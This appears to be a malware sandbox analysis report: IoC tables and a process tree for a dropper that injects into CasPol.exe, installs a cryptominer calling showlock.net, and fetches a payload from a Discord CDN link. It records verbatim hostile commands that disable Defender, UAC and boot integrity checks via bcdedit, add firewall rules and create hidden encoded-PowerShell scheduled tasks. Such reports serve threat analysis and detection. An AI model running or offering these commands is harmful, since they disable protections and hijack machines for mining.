040000000100000010000000e4a68ac854ac5242460afd72481b2a440f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a41400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f392000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6	patch.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3000	conhost.exe
2732	Ga1aWp1y35A2jCNYRRdwYaiw.exe
1280	reg.exe
2760	YzkPQgDELwrGtM0OTFyfOecE.exe
2760	YzkPQgDELwrGtM0OTFyfOecE.exe
2760	YzkPQgDELwrGtM0OTFyfOecE.exe
2760	YzkPQgDELwrGtM0OTFyfOecE.exe
2760	YzkPQgDELwrGtM0OTFyfOecE.exe
2956	Ga1aWp1y35A2jCNYRRdwYaiw.exe
2956	Ga1aWp1y35A2jCNYRRdwYaiw.exe
2956	Ga1aWp1y35A2jCNYRRdwYaiw.exe
2956	Ga1aWp1y35A2jCNYRRdwYaiw.exe
2956	Ga1aWp1y35A2jCNYRRdwYaiw.exe
2616	injector.exe
2616	injector.exe
2616	injector.exe
2616	injector.exe
2616	injector.exe
2208	powershell.EXE
2616	injector.exe
2208	powershell.EXE
2208	powershell.EXE
2616	injector.exe
2616	injector.exe
2616	injector.exe
2616	injector.exe
2616	injector.exe
2616	injector.exe
2616	injector.exe
2616	injector.exe
2616	injector.exe
2616	injector.exe
2616	injector.exe
2616	injector.exe
2616	injector.exe
2616	injector.exe
2616	injector.exe
2616	injector.exe
2616	injector.exe
2616	injector.exe
2616	injector.exe
2616	injector.exe
2616	injector.exe
2616	injector.exe
2616	injector.exe
2616	injector.exe
2616	injector.exe
2616	injector.exe
2616	injector.exe
2616	injector.exe
2616	injector.exe
2616	injector.exe
2616	injector.exe
2616	injector.exe
2616	injector.exe
2684	bcdedit.exe
2684	bcdedit.exe
2684	bcdedit.exe
2616	injector.exe
2616	injector.exe
2616	injector.exe
2616	injector.exe
2616	injector.exe
2616	injector.exe

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
480	Process not Found

Suspicious use of AdjustPrivilegeToken 14 IoCs

description	pid	Process
Token: SeDebugPrivilege	2532	CasPol.exe
Token: SeDebugPrivilege	3000	conhost.exe
Token: SeDebugPrivilege	2732	Ga1aWp1y35A2jCNYRRdwYaiw.exe
Token: SeImpersonatePrivilege	2732	Ga1aWp1y35A2jCNYRRdwYaiw.exe
Token: SeDebugPrivilege	1280	reg.exe
Token: SeImpersonatePrivilege	1280	reg.exe
Token: SeSystemEnvironmentPrivilege	2008	csrss.exe
Token: SeDebugPrivilege	2208	powershell.EXE
Token: SeDebugPrivilege	2684	bcdedit.exe
Token: SeDebugPrivilege	3004	powershell.EXE
Token: SeDebugPrivilege	1668	powershell.EXE
Token: SeSecurityPrivilege	828	sc.exe
Token: SeSecurityPrivilege	828	sc.exe
Token: SeLockMemoryPrivilege	636	wup.exe

Suspicious use of FindShellTrayWindow 2 IoCs

pid	Process
2688	conhost.exe
636	wup.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2200 wrote to memory of 3000	2200	bd499108bc5684a3c356097facf9783a8f2331f63d7749363bb6c739ccc9c248.exe	261
PID 2200 wrote to memory of 3000	2200	bd499108bc5684a3c356097facf9783a8f2331f63d7749363bb6c739ccc9c248.exe	261
PID 2200 wrote to memory of 3000	2200	bd499108bc5684a3c356097facf9783a8f2331f63d7749363bb6c739ccc9c248.exe	261
PID 2200 wrote to memory of 3000	2200	bd499108bc5684a3c356097facf9783a8f2331f63d7749363bb6c739ccc9c248.exe	261
PID 2200 wrote to memory of 2532	2200	bd499108bc5684a3c356097facf9783a8f2331f63d7749363bb6c739ccc9c248.exe	30
PID 2200 wrote to memory of 2532	2200	bd499108bc5684a3c356097facf9783a8f2331f63d7749363bb6c739ccc9c248.exe	30
PID 2200 wrote to memory of 2532	2200	bd499108bc5684a3c356097facf9783a8f2331f63d7749363bb6c739ccc9c248.exe	30
PID 2200 wrote to memory of 2532	2200	bd499108bc5684a3c356097facf9783a8f2331f63d7749363bb6c739ccc9c248.exe	30
PID 2200 wrote to memory of 2532	2200	bd499108bc5684a3c356097facf9783a8f2331f63d7749363bb6c739ccc9c248.exe	30
PID 2200 wrote to memory of 2532	2200	bd499108bc5684a3c356097facf9783a8f2331f63d7749363bb6c739ccc9c248.exe	30
PID 2200 wrote to memory of 2532	2200	bd499108bc5684a3c356097facf9783a8f2331f63d7749363bb6c739ccc9c248.exe	30
PID 2200 wrote to memory of 2532	2200	bd499108bc5684a3c356097facf9783a8f2331f63d7749363bb6c739ccc9c248.exe	30
PID 2200 wrote to memory of 2532	2200	bd499108bc5684a3c356097facf9783a8f2331f63d7749363bb6c739ccc9c248.exe	30
PID 2532 wrote to memory of 2732	2532	CasPol.exe	31
PID 2532 wrote to memory of 2732	2532	CasPol.exe	31
PID 2532 wrote to memory of 2732	2532	CasPol.exe	31
PID 2532 wrote to memory of 2732	2532	CasPol.exe	31
PID 2532 wrote to memory of 1280	2532	CasPol.exe	194
PID 2532 wrote to memory of 1280	2532	CasPol.exe	194
PID 2532 wrote to memory of 1280	2532	CasPol.exe	194
PID 2532 wrote to memory of 1280	2532	CasPol.exe	194
PID 2532 wrote to memory of 2848	2532	CasPol.exe	102
PID 2532 wrote to memory of 2848	2532	CasPol.exe	102
PID 2532 wrote to memory of 2848	2532	CasPol.exe	102
PID 2532 wrote to memory of 2848	2532	CasPol.exe	102
PID 2760 wrote to memory of 292	2760	YzkPQgDELwrGtM0OTFyfOecE.exe	63
PID 2760 wrote to memory of 292	2760	YzkPQgDELwrGtM0OTFyfOecE.exe	63
PID 2760 wrote to memory of 292	2760	YzkPQgDELwrGtM0OTFyfOecE.exe	63
PID 2760 wrote to memory of 292	2760	YzkPQgDELwrGtM0OTFyfOecE.exe	63
PID 2956 wrote to memory of 1028	2956	Ga1aWp1y35A2jCNYRRdwYaiw.exe	40
PID 2956 wrote to memory of 1028	2956	Ga1aWp1y35A2jCNYRRdwYaiw.exe	40
PID 2956 wrote to memory of 1028	2956	Ga1aWp1y35A2jCNYRRdwYaiw.exe	40
PID 2956 wrote to memory of 1028	2956	Ga1aWp1y35A2jCNYRRdwYaiw.exe	40
PID 292 wrote to memory of 584	292	forfiles.exe	216
PID 292 wrote to memory of 584	292	forfiles.exe	216
PID 292 wrote to memory of 584	292	forfiles.exe	216
PID 1028 wrote to memory of 592	1028	cmd.exe	42
PID 1028 wrote to memory of 592	1028	cmd.exe	42
PID 1028 wrote to memory of 592	1028	cmd.exe	42
PID 2956 wrote to memory of 2008	2956	Ga1aWp1y35A2jCNYRRdwYaiw.exe	47
PID 2956 wrote to memory of 2008	2956	Ga1aWp1y35A2jCNYRRdwYaiw.exe	47
PID 2956 wrote to memory of 2008	2956	Ga1aWp1y35A2jCNYRRdwYaiw.exe	47
PID 2956 wrote to memory of 2008	2956	Ga1aWp1y35A2jCNYRRdwYaiw.exe	47
PID 2532 wrote to memory of 2544	2532	CasPol.exe	57
PID 2532 wrote to memory of 2544	2532	CasPol.exe	57
PID 2532 wrote to memory of 2544	2532	CasPol.exe	57
PID 2532 wrote to memory of 2544	2532	CasPol.exe	57
PID 2532 wrote to memory of 2544	2532	CasPol.exe	57
PID 2532 wrote to memory of 2544	2532	CasPol.exe	57
PID 2532 wrote to memory of 2544	2532	CasPol.exe	57
PID 2008 wrote to memory of 2616	2008	csrss.exe	55
PID 2008 wrote to memory of 2616	2008	csrss.exe	55
PID 2008 wrote to memory of 2616	2008	csrss.exe	55
PID 2008 wrote to memory of 2616	2008	csrss.exe	55
PID 2532 wrote to memory of 2512	2532	CasPol.exe	72
PID 2532 wrote to memory of 2512	2532	CasPol.exe	72
PID 2532 wrote to memory of 2512	2532	CasPol.exe	72
PID 2532 wrote to memory of 2512	2532	CasPol.exe	72
PID 2532 wrote to memory of 2512	2532	CasPol.exe	72
PID 2532 wrote to memory of 2512	2532	CasPol.exe	72
PID 2532 wrote to memory of 2512	2532	CasPol.exe	72
PID 2544 wrote to memory of 2636	2544	PSoXfVjiH22H5YX7QfDoJiUe.exe	67
PID 2544 wrote to memory of 2636	2544	PSoXfVjiH22H5YX7QfDoJiUe.exe	67
PID 2544 wrote to memory of 2636	2544	PSoXfVjiH22H5YX7QfDoJiUe.exe	67

System policy modification 1 TTPs 1 IoCs

evasion

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	bd499108bc5684a3c356097facf9783a8f2331f63d7749363bb6c739ccc9c248.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\bd499108bc5684a3c356097facf9783a8f2331f63d7749363bb6c739ccc9c248.exe
"C:\Users\Admin\AppData\Local\Temp\bd499108bc5684a3c356097facf9783a8f2331f63d7749363bb6c739ccc9c248.exe"
1⤵
- UAC bypass
- Windows security bypass
- Windows security modification
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
- System policy modification
PID:2200
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\bd499108bc5684a3c356097facf9783a8f2331f63d7749363bb6c739ccc9c248.exe" -Force
  2⤵
  PID:3000
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
  2⤵
  - Drops startup file
  - Loads dropped DLL
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2532
- - C:\Users\Admin\Pictures\Ga1aWp1y35A2jCNYRRdwYaiw.exe
    "C:\Users\Admin\Pictures\Ga1aWp1y35A2jCNYRRdwYaiw.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2732
  - - C:\Users\Admin\Pictures\Ga1aWp1y35A2jCNYRRdwYaiw.exe
      "C:\Users\Admin\Pictures\Ga1aWp1y35A2jCNYRRdwYaiw.exe"
      4⤵
      Windows security bypass
      Executes dropped EXE
      Loads dropped DLL
      Windows security modification
      Adds Run key to start application
      Checks for VirtualBox DLLs, possible anti-VM trick
      Drops file in Windows directory
      Modifies data under HKEY_USERS
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of WriteProcessMemory
      PID:2956
    - - C:\Windows\rss\csrss.exe
        
        C:\Windows\rss\csrss.exe
        5⤵
        Drops file in Drivers directory
        Executes dropped EXE
        Loads dropped DLL
        Adds Run key to start application
        Manipulates WinMon driver.
        Manipulates WinMonFS driver.
        Drops file in Windows directory
        Modifies system certificate store
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:2008
      - C:\Windows\system32\schtasks.exe
        
        schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        6⤵
        Creates scheduled task(s)
        
        PID:644
      - C:\Windows\system32\schtasks.exe
        
        schtasks /delete /tn ScheduledUpdate /f
        6⤵
        
        PID:1504
      - C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
        
        "C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Modifies system certificate store
        
        PID:1112
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows
        7⤵
        Modifies boot configuration data using bcdedit
        
        PID:2140
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast
        7⤵
        Modifies boot configuration data using bcdedit
        
        PID:1280
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}
        7⤵
        Modifies boot configuration data using bcdedit
        
        PID:2148
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -timeout 0
        7⤵
        Modifies boot configuration data using bcdedit
        
        PID:2688
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}
        7⤵
        Modifies boot configuration data using bcdedit
        
        PID:2868
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1
        7⤵
        Modifies boot configuration data using bcdedit
        
        PID:2536
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn
        7⤵
        Modifies boot configuration data using bcdedit
        
        PID:1076
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0
        7⤵
        Modifies boot configuration data using bcdedit
        
        PID:704
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe
        7⤵
        Modifies boot configuration data using bcdedit
        
        PID:2600
        
        C:\Windows\SysWOW64\reg.exe
        
        REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
        8⤵
        
        PID:3000
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe
        7⤵
        Modifies boot configuration data using bcdedit
        
        PID:1752
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:
        7⤵
        Modifies boot configuration data using bcdedit
        
        PID:1856
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:
        7⤵
        Modifies boot configuration data using bcdedit
        
        PID:1756
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER
        7⤵
        Modifies boot configuration data using bcdedit
        
        PID:2056
      - C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
        
        C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
        6⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:2616
      - C:\Windows\system32\bcdedit.exe
        
        C:\Windows\Sysnative\bcdedit.exe /v
        6⤵
        Modifies boot configuration data using bcdedit
        Drops file in System32 directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2684
      - C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
        
        C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
        6⤵
        Executes dropped EXE
        
        PID:1852
      - C:\Windows\system32\schtasks.exe
        
        schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        6⤵
        Creates scheduled task(s)
        
        PID:1660
      - C:\Windows\windefender.exe
        
        "C:\Windows\windefender.exe"
        6⤵
        Executes dropped EXE
        
        PID:2944
      - C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe
        
        C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe -xor=uiGheigee2Wuisoh -m=https://cdn.discordapp.com/attachments/1176914652060459101/1177177956087504956/xDYNmhJEPV -pool tls://showlock.net:40001 -pool tls://showlock.net:443 -pool tcp://showlock.net:80
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:2260
        
        C:\Windows\rss\csrss.exe
        
        C:\Windows\rss\csrss.exe -hide 636
        7⤵
        Executes dropped EXE
        Manipulates WinMon driver.
        
        PID:576
        
        C:\Users\Admin\AppData\Local\Temp\csrss\wup\xarch\wup.exe
        
        C:\Users\Admin\AppData\Local\Temp\csrss\wup\xarch\wup.exe -o showlock.net:40001 --rig-id 7177dd3d-3a61-4a1f-b84c-7afc6a07d22f --tls --nicehash -o showlock.net:443 --rig-id 7177dd3d-3a61-4a1f-b84c-7afc6a07d22f --tls --nicehash -o showlock.net:80 --rig-id 7177dd3d-3a61-4a1f-b84c-7afc6a07d22f --nicehash --http-port 3433 --http-access-token 7177dd3d-3a61-4a1f-b84c-7afc6a07d22f --randomx-wrmsr=-1
        7⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        
        PID:636
      - C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe
        
        C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe
        6⤵
        Executes dropped EXE
        
        PID:2248
      - C:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exe
        
        C:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exe
        6⤵
        Executes dropped EXE
        
        PID:1364
- - C:\Users\Admin\Pictures\YzkPQgDELwrGtM0OTFyfOecE.exe
    "C:\Users\Admin\Pictures\YzkPQgDELwrGtM0OTFyfOecE.exe"
    3⤵
    PID:1280
  - - C:\Users\Admin\Pictures\YzkPQgDELwrGtM0OTFyfOecE.exe
      "C:\Users\Admin\Pictures\YzkPQgDELwrGtM0OTFyfOecE.exe"
      4⤵
      Windows security bypass
      Executes dropped EXE
      Windows security modification
      Adds Run key to start application
      Checks for VirtualBox DLLs, possible anti-VM trick
      Drops file in Windows directory
      Modifies data under HKEY_USERS
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of WriteProcessMemory
      PID:2760
- - C:\Users\Admin\Pictures\qdejRCnNlH3y3MxHH1mhxoRV.exe
    "C:\Users\Admin\Pictures\qdejRCnNlH3y3MxHH1mhxoRV.exe"
    3⤵
    PID:2848
- - C:\Users\Admin\Pictures\PSoXfVjiH22H5YX7QfDoJiUe.exe
    "C:\Users\Admin\Pictures\PSoXfVjiH22H5YX7QfDoJiUe.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:2544
  - - C:\Users\Admin\AppData\Local\Temp\7zS31F9.tmp\Install.exe
      .\Install.exe
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:2636
- - C:\Users\Admin\Pictures\hLnT2nBwKptJfO7HbITCc0Up.exe
    "C:\Users\Admin\Pictures\hLnT2nBwKptJfO7HbITCc0Up.exe" PeJj3z5KgQO+REOMHfxRWZMfrERTkhHmRUWETPcQX9Iwim5oqDrINyf9NcQnEA==
    3⤵
    - Executes dropped EXE
    PID:1184
- - C:\Users\Admin\Pictures\8NEVmM8hj8lMUTThXm7yQ4Pe.exe
    "C:\Users\Admin\Pictures\8NEVmM8hj8lMUTThXm7yQ4Pe.exe" /VERYSILENT
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:2512
- - C:\Users\Admin\Pictures\69dkxh291SILb89gnNbihBC1.exe
    "C:\Users\Admin\Pictures\69dkxh291SILb89gnNbihBC1.exe" --silent --allusers=0
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:2124

C:\Windows\system32\makecab.exe
"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20240204035515.log C:\Windows\Logs\CBS\CbsPersist_20240204035515.cab
1⤵
- Drops file in Windows directory
PID:1828

C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
1⤵
- Suspicious use of WriteProcessMemory
PID:1028
- C:\Windows\system32\netsh.exe
  netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
  2⤵
  - Modifies Windows Firewall
  - Modifies data under HKEY_USERS
  PID:592

C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
1⤵
PID:292
- C:\Windows\system32\netsh.exe
  netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
  2⤵
  - Modifies Windows Firewall
  PID:584

C:\Users\Admin\AppData\Local\Temp\is-FE9HH.tmp\8NEVmM8hj8lMUTThXm7yQ4Pe.tmp
"C:\Users\Admin\AppData\Local\Temp\is-FE9HH.tmp\8NEVmM8hj8lMUTThXm7yQ4Pe.tmp" /SL5="$120164,831488,831488,C:\Users\Admin\Pictures\8NEVmM8hj8lMUTThXm7yQ4Pe.exe" /VERYSILENT
1⤵
PID:2688

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
1⤵
PID:448
- C:\Windows\SysWOW64\cmd.exe
  /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
  2⤵
  PID:768
- - \??\c:\windows\SysWOW64\reg.exe
    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:2820
- - \??\c:\windows\SysWOW64\reg.exe
    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:2964

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
1⤵
- Suspicious use of WriteProcessMemory
PID:292
- C:\Windows\SysWOW64\cmd.exe
  /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
  2⤵
  PID:2936
- - \??\c:\windows\SysWOW64\reg.exe
    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
    3⤵
    PID:2580
- - \??\c:\windows\SysWOW64\reg.exe
    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
    3⤵
    PID:2276

C:\Users\Admin\AppData\Local\Temp\7zS34E6.tmp\Install.exe
.\Install.exe /mGaXdidI "385118" /S
1⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Loads dropped DLL
- Checks for any installed AV software in registry
- Drops file in System32 directory
- Enumerates system info in registry
PID:2120
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "gGcgmjpfn" /SC once /ST 00:40:23 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
  2⤵
  - Creates scheduled task(s)
  PID:3040
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "gGcgmjpfn"
  2⤵
  PID:2480
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "gGcgmjpfn"
  2⤵
  PID:1436
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "bwKBwqZYjkqxftWshF" /SC once /ST 03:56:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\vYzpyBFfHhXPDWiMt\NQONvMOpkwRLZMC\uUVSWZe.exe\" cj /Cgsite_idUrU 385118 /S" /V1 /F
  2⤵
  - Drops file in Windows directory
  - Creates scheduled task(s)
  PID:1916

C:\Windows\system32\taskeng.exe
taskeng.exe {F80E1ED2-9599-480A-9AA0-490C38C1A057} S-1-5-21-3627615824-4061627003-3019543961-1000:SCFGBRBT\Admin:Interactive:[1]
1⤵
PID:2388
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  2⤵
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2208
- - C:\Windows\system32\gpupdate.exe
    "C:\Windows\system32\gpupdate.exe" /force
    3⤵
    PID:804
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  2⤵
  PID:2684
- - C:\Windows\system32\gpupdate.exe
    "C:\Windows\system32\gpupdate.exe" /force
    3⤵
    PID:1764
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  2⤵
  - Drops file in System32 directory
  - Suspicious use of AdjustPrivilegeToken
  PID:3004
- - C:\Windows\system32\gpupdate.exe
    "C:\Windows\system32\gpupdate.exe" /force
    3⤵
    PID:1864
